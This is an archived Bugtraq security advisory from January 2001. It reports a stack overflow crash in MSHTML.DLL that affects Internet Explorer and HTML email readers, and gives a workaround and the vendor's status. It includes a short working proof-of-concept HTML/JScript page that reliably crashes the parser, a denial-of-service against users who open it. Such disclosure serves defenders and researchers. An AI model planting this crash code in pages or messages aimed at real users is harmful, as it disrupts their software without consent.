[18625] in bugtraq
Stack Overflow in MSHTML.DLL
daemon@ATHENA.MIT.EDU (Thor Larholm)
Mon Jan 15 15:10:44 2001
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id: <049601c07ec9$d5e38d40$e18270d4@wks.jubii.dk>
Date: Mon, 15 Jan 2001 09:04:50 +0100
Reply-To: Thor Larholm <thor@JUBII.DK>
From: Thor Larholm <thor@JUBII.DK>
To: BUGTRAQ@SECURITYFOCUS.COM
Stack Overflow in MSHTML.DLL
Systems affected:
Any program using MSHTML.DLL for HTML parsing (Internet Explorer,
Outlook/Outlook Express and other HTML-enabled email readers).
Reliably tested on IE 4.0 and higher on any Windows system, with any service packs
and patches.
Older versions of MSHTML.DLL may be affected too, but remain untested.
Risk: Low/Medium
Description:
MSHTML.DLL crashes with a Stack Overflow from simple scripting.
Details:
The bug is only experienced when dealing with multiple window objects, where one
is receiving data. To reproduce the bug, create a JScript object, set a property
on the object from the window object receiving data, delete the object and
create it again.
No exploitable buffer overflows have been found so far.
Code:
------------InstantCrash.html-----------------
<iframe id=test style="display:none"></iframe>
<script>
Larholm = {}; // Object literal
test.document.open(); // Stream data
test.document.write("<s"+"cript>top.Larholm.test=0</s"+"cript>");
delete Larholm;
Larholm = {}; // Crash
</script>
----------------------------------------------
Workaround:
Disable Active Scripting.
Vendor status:
Microsoft was contacted on 4 December 2000.
The bug is considered to be a code quality bug, and will be addressed in a future SP
for IE.
--
Thor Larholm